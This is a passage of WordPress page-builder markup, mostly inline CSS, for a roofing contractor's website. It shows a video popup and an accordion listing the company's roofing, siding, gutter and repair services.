margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 .responsive-heading-desc-text {\n font-size: 64px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 .responsive-heading-desc-text {\n font-size: 50px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 .responsive-heading-desc-text {\n font-size: 34px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#ffffff\">Recent Works</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#ffffff\">We’re Providing Premium<br>Roofing Services</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:skt-blocks/video-popup {\"videoLink\":\"https://www.youtube.com/embed/7er8Dz9JaO0\",\"vidheight\":300,\"opacity\":0,\"counterId\":\"b9c1ce98-590e-4510-a141-94e3d465168a\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-b9c1ce98-590e-4510-a141-94e3d465168a .skt-blocks-video-popup__wrapper{\n max-width: undefinedpx; height: 300px; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-b9c1ce98-590e-4510-a141-94e3d465168a .skt-blocks-video-popup__wrapper{\n max-width: undefinedpx; height: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-b9c1ce98-590e-4510-a141-94e3d465168a .skt-blocks-video-popup__wrapper{\n max-width: undefinedpx; height: undefinedpx; }\n}\n</style><div class=\"skt-blocks-block-b9c1ce98-590e-4510-a141-94e3d465168a skt-blocks-video-popup alignundefined\"><div class=\"skt-blocks-video-popup__wrapper\" data-video=\"7er8Dz9JaO0\" style=\"border-width:1px;border-style:none;box-shadow:0px 0px   undefined \"><a href=\"#\" class=\"skt-blocks-video-popup__overlay\"></a><span class=\"skt-blocks-video-popup__play-button\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"30\" height=\"30\" viewBox=\"0 0 256 320\" style=\"width:30px;height:30px;fill:#ffffff;opacity:1\"><path d=\"M0 0v320l256-160L0 0z\"></path></svg></span></div></div>\n<!-- /wp:skt-blocks/video-popup --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"900cc149-4ce4-480a-b809-9965902c3d14\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":98,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#ffffff\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-8\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-8 skt-blocks-block-section-outer-wrap block-900cc149-4ce4-480a-b809-9965902c3d14 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-900cc149-4ce4-480a-b809-9965902c3d14 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-900cc149-4ce4-480a-b809-9965902c3d14 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-900cc149-4ce4-480a-b809-9965902c3d14 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 98px; padding-left: 10px; padding-right: 10px; }\n}\n .block-900cc149-4ce4-480a-b809-9965902c3d14.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-900cc149-4ce4-480a-b809-9965902c3d14.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-900cc149-4ce4-480a-b809-9965902c3d14.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-900cc149-4ce4-480a-b809-9965902c3d14.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-900cc149-4ce4-480a-b809-9965902c3d14.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-900cc149-4ce4-480a-b809-9965902c3d14 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-900cc149-4ce4-480a-b809-9965902c3d14 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-900cc149-4ce4-480a-b809-9965902c3d14.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-900cc149-4ce4-480a-b809-9965902c3d14 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-900cc149-4ce4-480a-b809-9965902c3d14.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-900cc149-4ce4-480a-b809-9965902c3d14 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-900cc149-4ce4-480a-b809-9965902c3d14.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(255, 255, 255, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"97bb4af3-b9f2-4900-a022-a0913b0c7b78\"} -->\n<style type=\"text/css\"> .block-97bb4af3-b9f2-4900-a022-a0913b0c7b78 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-97bb4af3-b9f2-4900-a022-a0913b0c7b78 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-97bb4af3-b9f2-4900-a022-a0913b0c7b78 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-97bb4af3-b9f2-4900-a022-a0913b0c7b78 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-97bb4af3-b9f2-4900-a022-a0913b0c7b78 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-97bb4af3-b9f2-4900-a022-a0913b0c7b78 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-97bb4af3-b9f2-4900-a022-a0913b0c7b78 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-97bb4af3-b9f2-4900-a022-a0913b0c7b78 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"rightPadding\":80,\"rightPaddingTablet\":30,\"rightPaddingMobile\":0,\"blockId\":\"acd473cb-3709-457f-9421-929321d17166\"} -->\n<style type=\"text/css\"> .block-acd473cb-3709-457f-9421-929321d17166 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-acd473cb-3709-457f-9421-929321d17166 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-acd473cb-3709-457f-9421-929321d17166 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 80px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-acd473cb-3709-457f-9421-929321d17166 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-acd473cb-3709-457f-9421-929321d17166 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 0px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-acd473cb-3709-457f-9421-929321d17166\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"4776dbfd-a2f7-456a-b568-581c1d04c6c0\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"subheadSpacingTablet\":35,\"subheadSpacingMobile\":25,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleFontWeight\":\"500\",\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":41,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 .responsive-heading-desc-text {\n margin-bottom: 35px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 .responsive-heading-desc-text {\n margin-bottom: 25px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 .responsive-heading-desc-text {\n font-size: 41px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-4776dbfd-a2f7-456a-b568-581c1d04c6c0 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-4776dbfd-a2f7-456a-b568-581c1d04c6c0\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:500;line-height:1;letter-spacing:0;color:#fe8333\">Our Services</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Guaranteed</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:spacer {\"height\":\"50px\"} -->\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/accordion {\"block_id\":\"1e53268c\",\"schema\":\"{\\u0022@context\\u0022:\\u0022https://schema.org\\u0022,\\u0022@type\\u0022:\\u0022AccordionPage\\u0022,\\u0022mainEntity\\u0022:[{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022Roofing\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022With Mike or Justin on every job you can be sure to receive quality that cannot be beat.\\u0022}},{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022Siding\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022Whether it be new vinyl shakes or custom metal trim contact Dunrite today for a free estimate.\\u0022}},{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022Gutters\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022As a vital role in the overall protection of your home call today for a free estimate on new seamless aluminum gutters by Dunrite.\\u0022}},{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022Repairs\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022We specialize in finding this and proceed swiftly to correctly fix the issues the first time. Call today for a free estimate on a repair quote by Dunrite.\\u0022}}]}\"} -->\n<div class=\"wp-block-skt-blocks-accordion skt-blocks-accordion__outer-wrap skt-blocks-block-1e53268c skt-blocks-accordion-icon-row skt-blocks-accordion-layout-accordion skt-blocks-accordion-expand-first-false skt-blocks-accordion-inactive-other-true skt-blocks-accordion-equal-height\"><style type=\"text/css\">.skt-blocks-block-1e53268c {\nmargin-top: undefinedpx;margin-bottom: undefinedpx;margin-left: undefinedpx;margin-right: undefinedpx;}\n.skt-blocks-block-1e53268c .skt-blocks-icon svg{\nwidth: 12px;height: 12px;font-size: 12px;margin-right: 10px;}\n.skt-blocks-block-1e53268c .skt-blocks-icon-active svg{\nwidth: 12px;height: 12px;font-size: 12px;fill: #656565;margin-right: 10px;}\n.skt-blocks-block-1e53268c .skt-blocks-icon svg:hover{\nfill: undefined!important;}\n.skt-blocks-block-1e53268c .skt-blocks-icon-active svg:hover{\nfill: undefined!important;}\n.skt-blocks-block-1e53268c .skt-blocks-accordion-item__outer-wrap{\nmargin-bottom: 10px;}\n.skt-blocks-block-1e53268c .skt-blocks-accordion__wrap.skt-blocks-buttons-layout-wrap{\ngrid-column-gap: 10px;grid-row-gap: 10px;}\n.skt-blocks-block-1e53268c .skt-blocks-accordion-titles-button{\npadding-top: 10px;padding-bottom: 10px;padding-right: 10px;padding-left: 10px;}\n.skt-blocks-block-1e53268c .skt-blocks-accordion-content span{\nmargin-top: 10px;margin-bottom: 10px;margin-right: 10px;margin-left: 10px;}\n.skt-blocks-block-1e53268c .skt-blocks-accordion-item:hover .skt-blocks-icon svg{\nfill: #656565;}\n.skt-blocks-block-1e53268c .skt-blocks-accordion-item .skt-blocks-accordion-titles-button.skt-blocks-accordion-titles{\nflex-direction: row;}\n.skt-blocks-block-1e53268c .skt-blocks-accordion-titles-button .skt-blocks-title{\nfont-size: undefinedpx;}\n.skt-blocks-block-1e53268c .skt-blocks-accordion-item .skt-blocks-accordion-content{\nbackground-image: linear-gradient(100deg,rgba(238, 238, 238, 100),rgba(238, 238, 238, 1));font-size: undefinedpx;}\n.skt-blocks-block-1e53268c .skt-blocks-accordion-item__outer-wrap .skt-blocks-accordion-content {\ndisplay: none;}\n@media only screen and (max-width: 1024px) {\n.skt-blocks-block-1e53268c .skt-blocks-accordion-titles-button{\npadding-top: 10px;padding-bottom: 10px;padding-right: 10px;padding-left: 10px;}\n.skt-blocks-block-1e53268c .skt-blocks-accordion-content span{\nmargin-top: 10px;margin-bottom: 10px;margin-right: 10px;margin-left: 10px;}\n.skt-blocks-block-1e53268c .skt-blocks-icon svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n.skt-blocks-block-1e53268c .skt-blocks-icon-active svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n}\n@media only screen and (max-width: 768px) {\n.skt-blocks-block-1e53268c .skt-blocks-accordion-titles-button{\npadding-top: 10px;padding-bottom: 10px;padding-right: 10px;padding-left: 10px;}\n.skt-blocks-block-1e53268c .skt-blocks-accordion-content span{\nmargin-top: 10px;margin-bottom: 10px;margin-right: 10px;margin-left: 10px;}\n.skt-blocks-block-1e53268c .skt-blocks-icon svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n.skt-blocks-block-1e53268c .skt-blocks-icon-active svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n}\n</style><style type=\"text/css\"> .skt-blocks-accordion-titles-button.skt-blocks-accordion-titles {\n color: undefined; background-color: #FFFFFF; }\n .skt-blocks-accordion-item-active .skt-blocks-accordion-titles-button.skt-blocks-accordion-titles {\n color: undefined; background-color: undefined; }\n</style><div class=\"skt-blocks-accordion__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/accordion-item {\"block_id\":\"40ca82c9\",\"title\":\"Roofing\",\"content\":\"With Mike or Justin on every job you can be sure to receive quality that cannot be beat.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-40ca82c9 gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Roofing</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>With Mike or Justin on every job you can be sure to receive quality that cannot be beat.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item -->\n\n<!-- wp:skt-blocks/accordion-item {\"block_id\":\"a081008d\",\"title\":\"Siding\",\"content\":\"Whether it be new vinyl shakes or custom metal trim contact Dunrite today for a free estimate.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-a081008d gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Siding</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>Whether it be new vinyl shakes or custom metal trim contact Dunrite today for a free estimate.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item -->\n\n<!-- wp:skt-blocks/accordion-item {\"block_id\":\"c015ecde\",\"title\":\"Gutters\",\"content\":\"As a vital role in the overall protection of your home call today for a free estimate on new seamless aluminum gutters by Dunrite.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-c015ecde gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Gutters</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>As a vital role in the overall protection of your home call today for a free estimate on new seamless aluminum gutters by Dunrite.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item -->\n\n<!-- wp:skt-blocks/accordion-item {\"block_id\":\"8f9f148e\",\"title\":\"Repairs\",\"content\":\"We specialize in finding this and proceed swiftly to correctly fix the issues the first time. Call today for a free estimate on a repair quote by Dunrite.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-8f9f148e gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Repairs</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>We specialize in finding this and proceed swiftly to correctly fix the issues the first time. Call today for a free estimate on a repair quote by Dunrite.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item --></div></div>\n<!-- /wp:skt-blocks/accordion --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPaddingMobile\":40,\"blockId\":\"e968bd23-7521-4da1-a172-0c209a166104\"} -->\n<style type=\"text/css\"> .block-e968bd23-7521-4da1-a172-0c209a166104 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-e968bd23-7521-4da1-a172-0c209a166104 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 